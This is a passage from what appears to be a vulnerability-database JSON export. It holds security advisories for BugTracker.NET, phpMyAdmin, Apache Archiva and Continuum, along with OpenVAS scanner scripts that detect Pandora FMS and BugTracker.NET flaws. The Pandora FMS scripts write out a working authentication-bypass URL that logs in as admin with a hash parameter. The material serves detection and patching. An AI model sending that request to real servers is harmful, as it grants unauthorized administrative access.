cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\n[http://corelabs.coresecurity.com].\r\n\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources are\r\nexposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and software\r\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\r\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\r\n[http://www.coresecurity.com].\r\n\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2010 Core Security\r\nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]\r\n\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].\r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2010-12-01T00:00:00", "title": "CORE-2010-1109 - Multiple vulnerabilities in BugTracker.Net", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-3266", "CVE-2010-3267"], "modified": "2010-12-01T00:00:00", "id": "SECURITYVULNS:DOC:25205", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25205", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:38", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2010:244\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : phpmyadmin\r\n Date : November 30, 2010\r\n Affected: Corporate 4.0, Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability has been found and corrected in phpmyadmin:\r\n \r\n It was possible to conduct a XSS attack using spoofed request on the\r\n db search script (CVE-2010-4329).\r\n \r\n This upgrade provides the latest phpmyadmin versions which is not\r\n vulnerable to this security issue.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4329\r\n http://www.phpmyadmin.net/home_page/security/PMASA-2010-8.php\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Corporate 4.0:\r\n 87bb4457e07c68c7eddee73bc942fdb1 corporate/4.0/i586/phpMyAdmin-2.11.11.1-0.1.20060mlcs4.noarch.rpm \r\n 013a296d2c2aa39a34b30b6d9e5f460c corporate/4.0/SRPMS/phpMyAdmin-2.11.11.1-0.1.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n 5c99ed5e8e313786e6f760076c81d2da corporate/4.0/x86_64/phpMyAdmin-2.11.11.1-0.1.20060mlcs4.noarch.rpm \r\n 013a296d2c2aa39a34b30b6d9e5f460c corporate/4.0/SRPMS/phpMyAdmin-2.11.11.1-0.1.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 70394e9ba0e8f350d6de2ca373dfd9b8 mes5/i586/phpmyadmin-3.3.8.1-0.1mdvmes5.1.noarch.rpm \r\n b656823ea2dca7d61eb6ba85c3900470 mes5/SRPMS/phpmyadmin-3.3.8.1-0.1mdvmes5.1.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n a3c6238fa1f3132a27a91aa503b6e2fc mes5/x86_64/phpmyadmin-3.3.8.1-0.1mdvmes5.1.noarch.rpm \r\n b656823ea2dca7d61eb6ba85c3900470 mes5/SRPMS/phpmyadmin-3.3.8.1-0.1mdvmes5.1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFM9MZBmqjQ0CJFipgRApUnAKDWTed6RtWZoUpy6VO0dea56dMivgCgjuzB\r\nQWpx1KX1wp8A2aQ6IUyyCTg=\r\n=+E4U\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2010-12-01T00:00:00", "title": "[ MDVSA-2010:244 ] phpmyadmin", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-4329"], "modified": "2010-12-01T00:00:00", "id": "SECURITYVULNS:DOC:25228", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25228", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "cvelist": ["CVE-2010-3449"], "description": "CVE-2010-3449: Apache Archiva CSRF Vulnerability\r\n\r\nSeverity: Important\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nArchiva 1.0 to 1.0.3 (end of life)\r\nArchiva 1.1 to 1.1.4 (end of life)\r\nArchiva 1.2 to 1.2.2 (end of life)\r\nArchiva 1.3 to 1.3.1\r\n\r\nDescription:\r\nApache Archiva doesn't check which form sends credentials. An attacker\r\ncan create a specially crafted page and force archiva administrators\r\nto view it and change their credentials. To fix this, a referrer check\r\nwas added to the security interceptor for all secured actions. A\r\nprompt for the administrator's password when changing a user account\r\nwas also set in place.\r\n\r\nMitigation:\r\nAll users should upgrade to 1.3.2 (http://archiva.apache.org/download.html)\r\n\r\nCredit:\r\nThis issue was discovered by Anatolia Security Research Group\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\n\r\nThanks,\r\nThe Apache Archiva Team", "edition": 1, "modified": "2010-12-01T00:00:00", "published": "2010-12-01T00:00:00", "id": "SECURITYVULNS:DOC:25227", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25227", "title": "[CVE-2010-3449] Apache Archiva CSRF Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "cvelist": ["CVE-2010-3449"], "description": "CVE-2010-3449: Apache Continuum CSRF vulnerability\r\n\r\nSeverity: Important\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nContinuum 1.3.6\r\nContinuum 1.4.0 (Beta)\r\nThe unsupported versions Continuum 1.1 - 1.2.3.1 are also affected.\r\n\r\nDescription:\r\nAdministrators are able to change any user's password, but the\r\nsource of the request is not verified, making the behaviour\r\nsusceptible to CSRF.\r\n\r\nMitigation:\r\nContinuum 1.3.6 and earlier users should upgrade to 1.3.7\r\n\r\nContinuum 1.4.0 (Beta) users should apply the following patch:\r\nhttp://svn.apache.org/viewvc?view=revision&revision=1066010\r\n\r\nCredit:\r\nThis issue was discovered by Anatolia Security Research Group\r\n\r\nReferences:\r\nhttp://continuum.apache.org/security.html\r\n\r\n--\r\nBrett Porter\r\nbrett@apache.org\r\nhttp://brettporter.wordpress.com/\r\nhttp://au.linkedin.com/in/brettporter\r\n\r\n\r\n", "edition": 1, "modified": "2011-02-11T00:00:00", "published": "2011-02-11T00:00:00", "id": "SECURITYVULNS:DOC:25647", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25647", "title": "[SECURITY] CVE-2010-3449: Apache Continuum CSRF vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:38", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2139-1 security@debian.org\r\nhttp://www.debian.org/security/ Thijs Kinkhorst\r\nDecember 31, 2010 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : phpmyadmin\r\nVulnerability : several\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2010-4329 CVE-2010-4480 CVE-2010-4481\r\n\r\nSeveral vulnerabilities have been discovered in phpMyAdmin, a tool\r\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\r\nproject identifies the following problems:\r\n\r\nCVE-2010-4329\r\n\r\n Cross site scripting was possible in search, that allowed\r\n a remote attacker to inject arbitrary web script or HTML.\r\n\r\nCVE-2010-4480\r\n\r\n Cross site scripting was possible in errors, that allowed\r\n a remote attacker to inject arbitrary web script or HTML.\r\n\r\nCVE-2010-4481\r\n\r\n Display of PHP's phpinfo() function was available to world, but only\r\n if this functionality had been enabled (defaults to off). This may\r\n leak some information about the host system.\r\n\r\nFor the stable distribution (lenny), these problems have been fixed in\r\nversion 2.11.8.1-5+lenny7.\r\n\r\nFor the testing (squeeze) and unstable distribution (sid), these problems\r\nhave been fixed in version 3.3.7-3.\r\n\r\nWe recommend that you upgrade your phpmyadmin package.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQEcBAEBAgAGBQJNHf0sAAoJEOxfUAG2iX57ulcIAL/G01SH84xfAQeKRarQSM+L\r\nJdOx/v9un204DK+N2Cj9qwI/oCY8gVoyISU1emufUgmsl5f0osADWpL6kv0gCaKk\r\nADXYs77K78/KDa3eixWMVMkspRxZBXA6TT6GkgSZYB14pF2krFOKXpUc3kk9dy3v\r\nI1qV9YnJhw/gXGn7XX6/Htnuu9aYqGc4+GcfFYW0j8FeJ8Og/VmgubkITvUyAHiR\r\nHE98xPwek8WhTXdsNsqpseraeaoscdizCbIfb2fHSaCJKZj+sY5eeVVOaqsG4RdV\r\nT34FuRRjsl0FrHEWSZK650cKcMvU3loAcCJnx94PTW5oqk7XDQihlInaoqEBlNY=\r\n=ZWgu\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2011-01-03T00:00:00", "title": "[SECURITY] [DSA 2139-1] New phpmyadmin packages fix several vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-4480", "CVE-2010-4329", "CVE-2010-4481"], "modified": "2011-01-03T00:00:00", "id": "SECURITYVULNS:DOC:25426", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25426", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T18:57:53", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "cvss3": {}, "published": "2011-01-03T00:00:00", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2010-4480", "CVE-2010-4329", "CVE-2010-4481"], "modified": "2011-01-03T00:00:00", "id": "SECURITYVULNS:VULN:11328", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11328", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2021-06-08T18:52:22", "bulletinFamily": "software", "cvelist": ["CVE-2010-3449", "CVE-2011-0050", "CVE-2011-0533"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 2, "modified": "2011-02-11T00:00:00", "published": "2011-02-11T00:00:00", "id": "SECURITYVULNS:VULN:11414", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11414", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-05-12T17:33:13", "description": "Pandora FMS is prone to an authentication-bypass vulnerability as well\n as the following input-validation vulnerabilities:\n\n 1. A command-injection vulnerability\n\n 2. Multiple SQL-injection vulnerabilities\n\n 3. A remote file-include vulnerability\n\n 4. An arbitrary PHP-code-execution vulnerability\n\n 5. Multiple local file-include vulnerabilities", "cvss3": {}, "published": "2010-12-01T00:00:00", "type": "openvas", "title": "Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4283", "CVE-2010-4281", "CVE-2010-4280", "CVE-2010-4282", "CVE-2010-4278", "CVE-2010-4279"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310100927", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100927", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:artica:pandora_fms\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100927\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-12-01 14:30:53 +0100 (Wed, 01 Dec 2010)\");\n script_bugtraq_id(45112);\n script_cve_id(\"CVE-2010-4278\", \"CVE-2010-4279\", \"CVE-2010-4280\", \"CVE-2010-4281\", \"CVE-2010-4282\", \"CVE-2010-4283\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_pandora_fms_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"pandora_fms/installed\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the reference for more details.\");\n\n script_tag(name:\"summary\", value:\"Pandora FMS is prone to an authentication-bypass vulnerability as well\n as the following input-validation vulnerabilities:\n\n 1. A command-injection vulnerability\n\n 2. Multiple SQL-injection vulnerabilities\n\n 3. A remote file-include vulnerability\n\n 4. An arbitrary PHP-code-execution vulnerability\n\n 5. Multiple local file-include vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Attackers may exploit these issues to execute local and remote script\n code in the context of the affected application, compromise the\n application, obtain sensitive information, access or modify data,\n exploit latent vulnerabilities in the underlying database, and gain\n administrative access to the affected application.\");\n\n script_tag(name:\"affected\", value:\"Versions prior and including Pandora FMS 3.1 are vulnerable.\");\n\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/45112\");\n script_xref(name:\"URL\", value:\"http://pandorafms.org/index.php?sec=project&sec2=home&lng=en\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/514939\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE, service: \"www\"))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\";\n\nif (http_vuln_check(port:port, url:url,pattern:\"This is your last activity in Pandora FMS console\",\n extra_check:make_list(\":: Administration ::\",\":: Operation ::\"))) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:51", "description": "Pandora FMS is prone to an authentication-bypass vulnerability as well\nas the following input-validation vulnerabilities:\n\n1. A command-injection vulnerability\n2. Multiple SQL-injection vulnerabilities\n3. A remote file-include vulnerability\n4. An arbitrary PHP-code-execution vulnerability\n5. Multiple local file-include vulnerabilities\n\nAttackers may exploit these issues to execute local and remote script\ncode in the context of the affected application, compromise the\napplication, obtain sensitive information, access or modify data,\nexploit latent vulnerabilities in the underlying database, and gain\nadministrative access to the affected application.\n\nVersions prior and including Pandora FMS 3.1 are vulnerable.", "cvss3": {}, "published": "2010-12-01T00:00:00", "type": "openvas", "title": "Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4283", "CVE-2010-4281", "CVE-2010-4280", "CVE-2010-4282", "CVE-2010-4278", "CVE-2010-4279"], "modified": "2017-02-17T00:00:00", "id": "OPENVAS:100927", "href": "http://plugins.openvas.org/nasl.php?oid=100927", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_pandora_fms_45112.nasl 5323 2017-02-17 08:49:23Z teissa $\n#\n# Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Pandora FMS is prone to an authentication-bypass vulnerability as well\nas the following input-validation vulnerabilities:\n\n1. A command-injection vulnerability\n2. Multiple SQL-injection vulnerabilities\n3. A remote file-include vulnerability\n4. An arbitrary PHP-code-execution vulnerability\n5. Multiple local file-include vulnerabilities\n\nAttackers may exploit these issues to execute local and remote script\ncode in the context of the affected application, compromise the\napplication, obtain sensitive information, access or modify data,\nexploit latent vulnerabilities in the underlying database, and gain\nadministrative access to the affected application.\n\nVersions prior and including Pandora FMS 3.1 are vulnerable.\";\n\ntag_solution = \"Updates are available. Please see the reference for more details.\";\n\nif (description)\n{\n script_id(100927);\n script_version(\"$Revision: 5323 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-17 09:49:23 +0100 (Fri, 17 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-01 14:30:53 +0100 (Wed, 01 Dec 2010)\");\n script_bugtraq_id(45112);\n script_cve_id(\"CVE-2010-4278\",\"CVE-2010-4279\",\"CVE-2010-4280\",\"CVE-2010-4281\",\"CVE-2010-4282\",\"CVE-2010-4283\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities\");\n\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_pandora_fms_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"https://www.securityfocus.com/bid/45112\");\n script_xref(name : \"URL\" , value : \"http://pandorafms.org/index.php?sec=project&sec2=home&lng=en\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/514939\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\n \nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\nif(!can_host_php(port:port))exit(0);\n\nif(!dir = get_dir_from_kb(port:port, app:\"pandora_fms\"))exit(0);\nurl = string(dir, \"/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\"); \n\nif(http_vuln_check(port:port, url:url,pattern:\"This is your last activity in Pandora FMS console\",extra_check:make_list(\":: Administration ::\",\":: Operation ::\"))) {\n \n security_message(port:port);\n exit(0);\n\n}\n\nexit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-12T17:32:26", "description": "The host is running BugTracker.NET and is prone to cross-site\n scripting and SQL injection vulnerabilities.", "cvss3": {}, "published": "2011-04-01T00:00:00", "type": "openvas", "title": "BugTracker.NET Cross-Site Scripting and SQL Injection Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3266", "CVE-2010-3267"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310902407", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902407", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# BugTracker.NET Cross-Site Scripting and SQL Injection Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902407\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-04-01 15:39:52 +0200 (Fri, 01 Apr 2011)\");\n script_bugtraq_id(45121);\n script_cve_id(\"CVE-2010-3266\", \"CVE-2010-3267\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"BugTracker.NET Cross-Site Scripting and SQL Injection Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/42418\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/15653/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/archive/1/514957/100/0/threaded\");\n script_xref(name:\"URL\", value:\"http://www.coresecurity.com/content/multiple-vulnerabilities-in-bugtracker\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_bugtracker_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"BugTrackerNET/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to cause SQL Injection attack\n and to conduct cross-site scripting attacks.\");\n\n script_tag(name:\"affected\", value:\"BugTracker.NET version prior to 3.4.5.\");\n\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - Input passed to the 'pcd' parameter in edit_bug.aspx, 'bug_id' parameter\n in edit_comment.aspx, 'default_name' parameter in edit_customfield.aspx,\n and 'id' parameter in edit_user_permissions2.aspx is not properly sanitised\n before being returned to the user.\n\n - Input passed via the 'qu_id' parameter to bugs.aspx, 'row_id' parameter to\n delete_query.aspx, 'us_id' and 'new_project' parameters to edit_bug.aspx,\n and 'bug_list' parameter to massedit.aspx is not properly sanitised before\n being used in a SQL query.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to BugTracker.NET version 3.4.5 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"The host is running BugTracker.NET and is prone to cross-site\n scripting and SQL injection vulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\nport = http_get_port(default:80);\n\nif(ver = get_version_from_kb(port:port, app:\"btnet\"))\n{\n if(version_is_less(version:ver, test_version: \"3.4.5\")){\n report = report_fixed_ver(installed_version:ver, fixed_version:\"3.4.5\");\n security_message(port: port, data: report);\n }\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2017-09-04T14:19:36", "description": "The host is running BugTracker.NET and is prone to cross-site\n scripting and SQL injection vulnerabilities.", "cvss3": {}, "published": "2011-04-01T00:00:00", "type": "openvas", "title": "BugTracker.NET Cross-Site Scripting and SQL Injection Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3266", "CVE-2010-3267"], "modified": "2017-08-30T00:00:00", "id": "OPENVAS:902407", "href": "http://plugins.openvas.org/nasl.php?oid=902407", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_bugtracker_dotnet_xss_n_sql_injection_vuln.nasl 7024 2017-08-30 11:51:43Z teissa $\n#\n# BugTracker.NET Cross-Site Scripting and SQL Injection Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to cause SQL Injection attack\n and to conduct cross-site scripting attacks.\n Impact Level: Application\";\ntag_affected = \"BugTracker.NET version prior to 3.4.5\";\ntag_insight = \"The flaws are due to:\n - Input passed to the 'pcd' parameter in edit_bug.aspx, 'bug_id' parameter\n in edit_comment.aspx, 'default_name' parameter in edit_customfield.aspx,\n and 'id' parameter in edit_user_permissions2.aspx is not properly sanitised\n before being returned to the user.\n - Input passed via the 'qu_id' parameter to bugs.aspx, 'row_id' parameter to\n delete_query.aspx, 'us_id' and 'new_project' parameters to edit_bug.aspx,\n and 'bug_list' parameter to massedit.aspx is not properly sanitised before\n being used in a SQL query.\";\ntag_solution = \"Upgrade to BugTracker.NET version 3.4.5 or later,\n For updates refer to http://www.ifdefined.com/bugtrackernet_download.html\";\ntag_summary = \"The host is running BugTracker.NET and is prone to cross-site\n scripting and SQL injection vulnerabilities.\";\n\nif(description)\n{\n script_id(902407);\n script_version(\"$Revision: 7024 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-08-30 13:51:43 +0200 (Wed, 30 Aug 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-01 15:39:52 +0200 (Fri, 01 Apr 2011)\");\n script_bugtraq_id(45121);\n 